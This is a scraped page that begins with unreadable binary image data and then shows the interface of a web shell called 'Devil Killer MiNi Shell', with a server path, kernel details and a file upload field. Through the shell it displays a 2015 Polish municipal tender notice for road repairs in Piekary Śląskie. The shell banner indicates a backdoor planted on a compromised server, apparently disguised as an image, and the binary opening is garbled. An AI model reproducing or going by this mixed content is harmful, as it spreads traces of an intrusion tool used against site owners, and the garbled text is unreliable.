JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151124/317658-N-2015.html

<p class="kh_header"><b>Piekary Śląskie: Remonty bieżące dróg na terenie miasta Piekary w 2016 roku</b><br>
<b>Numer ogłoszenia: 317658 - 2015; data zamieszczenia: 24.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 32 3939379, faks 32 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty bieżące dróg na terenie miasta Piekary w 2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Zakres robót
1. KNR 2 31 803 03 plus  kalkulacja własna Mechaniczne lub ręczne rozebranie nawierzchni z mieszanek mineralno - bitumicznych grubości 3 cm z docięciem krawędzi, odwozem i utylizacją - 	1m2 - 	600.	
2. KNR 2 31 803 04 plus  kalkulacja własna	Mechaniczne lub ręczne rozebranie nawierzchni z mieszanek mineralno - bitumicznych, dodatek za każdy dalszy 1 cm z docięciem krawędzi, odwozem i utylizacją - 	1m2 - 	1200.	
3. Kalkulacja własna	Frezowanie nawierzchni asfaltowej gr. 4 cm z docięciem krawędzi, skuciem i odwozem na miejsce składowania lub zabudowania w granicach miasta - 1m2 - 10000. 	
4. Kalkulacja własna	Frezowanie nawierzchni asfaltowej - każdy następny 1 cm grubości z docięciem krawędzi skuciem i odwozem na miejsce składowania lub zabudowania w granicach miasta - 	1m2 - 	30000. 	
5. Kalkulacja własna	Koryta wykonywane mechanicznie i ręcznie na całej szer. i poszerzeniach jezdni i chodnika gł. 20 cm z odwozem i utylizacją	- 1m2	 - 7000.	
6. Kalkulacja własna	Koryta wykonywane mechanicznie i ręcznie na całej szer. i poszerzeniach za każde dalsze 5 cm głębokości z odwozem i utylizacją	- 1m2 - 	2000.	
7. KNR 2 31 0814 01 i 02  plus kalk. własna	Rozebranie obrzeży 6 na 20 i 8 na 30 na podsypce cementowo - piaskowej z odwozem i utylizacją gruzu - 	1m - 	2000.	
8. KNR 2 31 0812 03, KNR 2 31 0813 01 plus  kalk. własna	Rozebranie krawężników na ławie betonowej z odwozem i utylizacją gruzu	-1m - 	1200.	
9. Kalkulacja własna	Rozebranie krawężników na ławie betonowej z segregacją , ułożeniem na paletach i transportem na miejsce składowania	  -1m - 300.	
10. KNR 2 31 t 0815 01 i 02 analogia + kalk. własna Rozebranie kostki betonowej (6 lub 8 cm) płytek 35 na 35 na 5, 50 na 50 na 7 i trylinki z odwozem i utylizacją gruzu	- 1m2 -	2000.	
11. Kalkulacja własna	Ręczne rozebranie kostki betonowej (6 lub 8 cm) płytek 35 na 35 na 5, 50 na 50 na 7 i trylinki z segregacją , ułożeniem na paletach i transportem na miejsce składowania - 	1m2 - 	400.	
12. KNR 2 31 108 02 plus  kalk. własna Mechaniczne wyrównanie istniejącej podbudowy mieszanką mineralno - bitumiczną wraz z skropieniem	- 1t	- 250.	
13. KNR 2 31 107 01	Wyrównanie istniejącej podbudowy tłuczniem, średnia grubość warstwy po zagęszczeniu do 10 cm - 	1m3 - 	500.	
14.KNR 2 31 114 07	Wykonanie podbudowy z kruszywa łamanego naturalnego kamiennego grubości 8 cm  - 	1m2	- 1500.	
15.KNR 2 31 114 08	Wykonanie podbudowy z kruszywa łamanego naturalnego, dodatek za każdy następny 1 cm grubości - 	1m2 - 	18000.	
16.KNR 2 31 116 05	Podbudowa z żużla wielkopiecowego gr. 10 cm, rozścielenie ręczne -	1m2 - 	6000.	
17. KNR 2 31 116 06 	Podbudowa z żużla wielkopiecowego, rozścielenie ręczne, dodatek za każdy dalszy 1 cm	 - 1m2 - 	18000.	
18. Kalkulacja własna	 Remont cząstkowy nawierzchni bitumicznych mieszanką mineralno- bitumiczną na zimno z wycięciem i oczyszczeniem uszkodzonych miejsc (powierzchnia do 2 m2 ) z załadunkiem, wywozem i utylizacją rumoszu wraz z zalaniem szwów- 1t	- 25. 	
19. KNR 2 31 1106 01  kalk. własna 	Remont cząstkowy nawierzchni bitumicznych mieszankami mineralno - bitumicznymi z wycięciem i oczyszczeniem uszkodzonych miejsc (powierzchnia do 5 m2 ) z załadunkiem, wywozem i utylizacją rumoszu wraz z zalaniem szwów i skropieniem podłoża - 	1t - 	100.	
20. KNR 2 31 1106 01 analogia plus  kalk. własna Remont nawierzchni bitumicznych mieszankami mineralno - bitumicznymi z wycięciem i oczyszczeniem uszkodzonych miejsc (powierzchnia od 5 do 20 m2) z załadunkiem, wywozem i utylizacją rumoszu wraz z zalaniem szwów i skropieniem podłoża - 	1t - 	100. 	
21. KNR 2 31 310 05 + kalk. własna	Wykonanie warstwy ścieralnej z mieszanek mineralno - bitumicznych gr. 3 cm z skropieniem podłoża z transportem z wytwórni	- 1m2	11000. 	
22. KNR 2 31 310 06 + kalk. własna 	Wykonanie warstwy ścieralnej z mieszanek mineralno - bitumicznych, dodatek za każdy następny 1 cm grubości warstwy z transportem z wytwórni - 	1m2	 - 22000.	
23. KNR 2 31 310 01 + kalk. własna	Wykonanie warstwy wiążącej z mieszanek mineralno - bitumicznych gr. 4 cm z skropieniem podłoża z transportem z wytwórni - 1m2	- 4000. 	
24. KNR 2 31 310 02 + kalk. własna 	Wykonanie warstwy wiążącej z mieszanek mineralno - bitumicznych, dodatek za każdy następny 1 cm grubości warstwy z transportem z wytwórni - 	1m2	- 8000. 	
25. Kalkulacja własna	Naprawa ubytków i spękań nawierzchni bitumicznych poprzez wypełnienie grysem otoczonym emulsją bitumiczną REMONTERem	- 1m2 - 	1000.	
26. KNR 2 31 511 04 Wykonanie nawierzchni chodników, wjazdów, placów z kostki brukowej betonowej gr. 8 cm - szarej prostokątnej lub behaton	- 1m2 - 	3000.	
27. KNR 2 31 511 04	Wykonanie nawierzchni chodników, wjazdów, placów z kostki brukowej betonowej gr. 8 cm - kolorowej i integracyjnej prostokątnej lub behaton	1m2 - 	1000. 	
28. KNR 2 31 0502-06 analogia	Utwardzenie terenu płytami ażurowymi 60 na 40 cm gr. 8 i 10 cm (wjazdy, skarpy itp.)	- 1m2 - 	200.	
29. KNR 2 31 401 06 KNR2 31 402 04 KNR 2 31 403 01	+ kalk. własna Ułożenie krawężnika betonowego 15 na 30 i 15 na 22 cm na ławie betonowej z oporem, wykonaniem rowka i odwozem ziemi i utylizacją - 	1m - 	2000.	
30. KNR 2 31 407 02 + kalk. własna	Ułożenie obrzeży betonowych 6 na 20 cm na podsypce piaskowej z wykonaniem rowka, odwozem ziemi i utylizacją	- 1m	- 1000.	
31. KNR 2 31 0407 03 + kalk. własna Ułożenie obrzeży betonowych 8 na 30 cm na podsypce piaskowej z wykonaniem rowka, odwozem ziemi i utylizacją	- 1m	- 1000.	
32. KNR 2 31 1201 03 1202 02 plus  kalk własna	Przestawienie istniejącego krawężnika betonowego i kamiennego na nowej ławie betonowej - krawężnik z odzysku z wykonaniem rowka, odwozem ziemi gruzu i utylizacją	- 1m	- 200. 	
33. Kalkulacja własna	Przełożenie chodnika, wjazdów, jezdni z kostki betonowej gr. 6 i 8 cm, płytek 35 na 35 na 5, 50 na 50 na 7 i trylinki - 60 procent  materiału z odzysku z korytem, podbudową, odwozem gruzu i utylizacją - 1m2	- 200.	
34. KNR2 31 0204 5 analogia + kalk. własna Wykonanie nawierzchni z destruktu asfaltobet. grubości 7 cm z przesypaniem kruszywem  gabro o uziarnieniu od 0,05 do 6 mm oraz skropienie emulsją asfaltową	 - 1m2 - 	5000.	
35. Kalkulacja własna	Wypełnienie szczelin masą zalewową - szer. do 50 mm	- 1m - 	500. 	
36. KNR 2 31 1101 03 i 04 analogia + kalk. własna	Remonty cząstkowe nawierzchni tłuczniowych, żużlowych i z destruktu asfaltobet. o gł. do 10 cm  - 	1m2 - 1000. 	
37. KNR 2 31 1403 06 + kalk. własna	Wykoszenie i oczyszczenie rowu z namułu 
gr. do 30 cm z wyprofilowaniem skarp z odwozem i utylizacją - 	1m - 	2000. 	
38. KNR 2 31 1402 05 1402 06 analogia + kalk. własna 	Oczyszczenie, plantowanie i ścinanie poboczy na gł. do 25 cm z odwozem ziemi, gruzu i zanieczyszczeń wraz z utylizacją	- 1m2 - 	1500.	
39. KNR 2 01 0510 01 i 02	Humusowanie skarp i poboczy z obsianiem. Grubość warstwy humusu 10 cm	 - 1m2 - 	1000.	
40. KNR 2 18 0625 02	 + kalk. własna Zabudowanie nowego wpustu ulicznego z wykopem, odwozem i utulizacją ziemi i gruzu  - 	1szt. - 	10. 	
41. KNR 2 18 0501 02, KNR W 2 18 0408 03,KNR 2 01 0320 0201 + kalk. własna	Ułożenie kanału z rur PCV fi  200 - przykanalik z wykopem, odwozem i utylizacją ziemi i gruzu	- 1m - 	50. 	
42. Kalkulacja własna	Remont wpustu ulicznego wraz z wymianą kraty żeliwnej z wykopem, odwozem i utylizacją - 	1 szt. - 	25. 	
43. Kalkulacja własna	Remont studni rewizyjnej betonowej średnicy 1000 mm wraz z wymianą włazu żeliwnego typu ciężkiego	- 1 szt. - 	6.	
44. Kalkulacja własna	Frezowanie pni i korzeni z odwozem i utylizacją - 	1 cm2 - 	20000. 	
45	KNR 2 31 1406 05	Regulacja pionowa studni teletechnicznych - 	1 szt.	- 10. 	
46.	KNR 2 31 1406 02	Regulacja pionowa studzienek dla krat ściekowych ulicznych - 	1 szt. - 	40. 	
47. 	KNR 2 31 1406 03	Regulacja pionowa studzienek dla włazów kanałowych	- 1 szt.	- 40. 	
48. KNR 231 1406 04	Regulacja pionowa studzienek dla zaworów wodociągowych i gazowych - 	1 szt. - 	60.	
49	Stawka roboczogodziny z narzutami bez podatku VAT	1 r g	1000.	

II. Założenia ogólne do kalkulacji cen jednostkowych . 
1.	Sposób wyliczenia stawki roboczogodziny netto: 				                                    
stawka roboczogodziny , koszty ogólne do stawki r g  procent  zysk do r g wraz z kosztami ogólnymi procent, razem r g z narzutami zł
2.Kalkulację należy sporządzić na jednostkę obmiaru wyszczególnioną w przedmiarze robót.
3. Ceny jednostkowe netto powinny zawierać wartość materiału wraz z kosztami zakupu, jego dostawę na miejsce wbudowania, koszty ogólne i zysk. 
4.Cena 1m2 remontu nawierzchni przy użyciu REMONTERA  powinna zawierać: wyczyszczenie ubytku sprężonym powietrzem, spryskanie ubytku emulsją bitumiczną, wypełnienie ubytku grysem otoczonym emulsją bitumiczną, obsypanie suchym grysem naprawionej powierzchni oraz  w przypadkach uzgodnionych z inwestorem zawałowanie.
5.W wycenach należy uwzględnić:a) koszt oznakowania miejsca prowadzenia robót w pasie drogowym, b) koszt opracowania projektu zmiany organizacji ruchu na czas prowadzenia robót wynikający z wymogów zarządcy drogi, c) średni dodatek utrudnień za prowadzenie robót pod ruchem,d)koszt naniesienia na zasoby geodezyjne zmian w geometrii wprowadzonych w trakcie robót, e)wykonanie kosztorysów szacunkowych na zlecane roboty,  f)	koszt niezbędnych uzgodnień i nadzorów właścicieli uzbrojenia zlokalizowanego w pasach drogowych remontowanych,  g)	wszystkie roboty rozbiórkowe, frezowanie nawierzchni, korytowanie oprócz kosztów ogólnych              i zysku powinny zawierać koszt odwozu na miejsce utylizacji i koszt utylizacji,
h)remont studni rewizyjnej polegający na wymianie : 1 szt. kręgu beton  wys 500 mm, podmurówce, 1 szt  pierścienia odciążającego żelbetowego, pokrywy żelbetowej nastudziennej     i włazu żeliwnego typu ciężkiego,
i )  miejsce składowania destruktu asfaltobetonowego oraz materiałów z odzysku - oczyszczalnia ścieków MPWiK w Piekarach Śląskich, ul. Śląska

III. Inne informacje 
1.Przyjęte w kosztorysie ilości przedmiarowe robót są szacunkowe. Faktyczny zakres robót realizowany będzie w zależności od potrzeb zamawiającego na podstawie zleceń cząstkowych.
2.Ceny jednostkowe powinny zostać wyliczone ściśle wg podanych w przedmiarze podstaw wyceny KNR y oraz w załączniku nr 1 do przedmiaru robót. 
3. Zamawiający żąda zapewnienia całodobowej łączności telefonicznej z podaniem przez Wykonawcę numerów kontaktowych przed podpisaniem umowy oraz przystąpienia do robót w ciągu dwóch dni od otrzymania zlecenia, a w przypadku robót awaryjnych w ciągu 12 godzin od zgłoszenia telefonicznego niezależnie od pory dnia i dni wolnych od pracy oraz oznakowania i zabezpieczenia miejsca awarii ciągu 2 godzin  od zgłoszenia telefonicznego niezależnie od pory dnia i dni wolnych od pracy.
4.Gwarancja i rękojmia  -  min. 24 miesiące..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających (roboty tego samego rodzaju o wartości nie przekraczającej 800 000,00  złotych).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 50 000,00 złotych ( pięćdziesiąt tysięcy złotych 00/100).
2. Wadium może być wnoszone w jednej z form wskazanych w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
3. W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy Zamawiającego prowadzony przez ING Bank Śląski: nr 07 1050 1230 1000 0023 2549 4256. 
4. W przypadku wniesienia wadium w pieniądzu za moment wniesienia uznaje się moment uznania rachunku Zamawiającego.
5.  Potwierdzenie wniesienia wadium w formie pieniężnej należy dołączyć do oferty.    W przypadku złożenia wadium w formie poręczenia lub gwarancji bankowej bądź gwarancji ubezpieczeniowej należy załączyć oryginał dokumentu gwarancyjnego do oferty.
6.  Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
7.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy.
8.  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.  Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust.1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
  10.  Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
 11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, wskazanych w SIWZ, lub pełnomocnictw, chyba że wynika to z przyczyn nie leżących po jego stronie lub nie wyraził
zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
 -  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
 -  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
 -  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
13. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe, nieodwołalne i płatne w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego, wykonalne na terytorium Rzeczpospolitej Polskiej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli wykaże wykonanie w ostatnich pięciu latach przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie robót tożsamych z przedmiotem zamówienia tj. remontów jezdni, chodników,  placów itp.  o wartości brutto minimum 2 000 000,00 zł (dwa miliony złotych 00/100) rocznie  (jedna robota na kwotę 2 000 000,00 zł może stanowić sumę poszczególnych robót za dany rok)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie następującym sprzętem: 
1.	Frezarka do nawierzchni bitumicznych - szer. 0,5 i 1,0 m	1
2.	Walec wibracyjny do 6 t	2
3.	Walec statyczny samojezdny 10 t	2
4.	Walec statyczny samojezdny 15 t	2
5.	Rozkładarka mas bitumicznych o szerokości roboczej 1,5÷6,0 m	2
6.	Skrapiarka do asfaltu	2
7.	Samochód samowyładowczy 5 do 10 t 	2
8.	Samochód samowyładowczy 10 do 20 t	4
9.	Samochód skrzyniowy 5 do 10 t	2
10.	Samochód dostawczy 	1
11.	Ciągnik kołowy	2
12.	Przyczepa niskopodwoziowa	2
13.	Spężarka spalinowa (przewoźna)	2
14.	Koparko ładowarka	2
15.	Zalewarka szczelin	1
16.	Rozsypywarka gresów do walców drogowych	2
17.	Ścinarka poboczy (traktorowa)	1
18.	Remonter	1
19.	Piła spalinowa do cięcia kostki	2
20.	Piła spalinowa do cięcia asfaltu	2
21.	Zagęszczarka	2
22.	Komplet oznakowania robót drogowych	4
23.	Komplet sygnalizacji wahadłowej 	1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca spełni warunek, jeżeli wykaże 
dysponowanie minimum 1 osobą z uprawnieniami budowlanymi do pełnienia funkcji kierownika budowy w specjalności drogowej bez ograniczeń , posiadającą zaświadczenie wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa) o wpisie do ewidencji  i  posiadającą aktualne ubezpieczenie od odpowiedzialności cywilnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	posiadanie zdolności kredytowej  na kwotę min. 500 000,00 zł ( pięćset tysięcy złotych 00/100),
b)	posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości min. 1 000 000,00 zł ( jeden milion  złotych 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

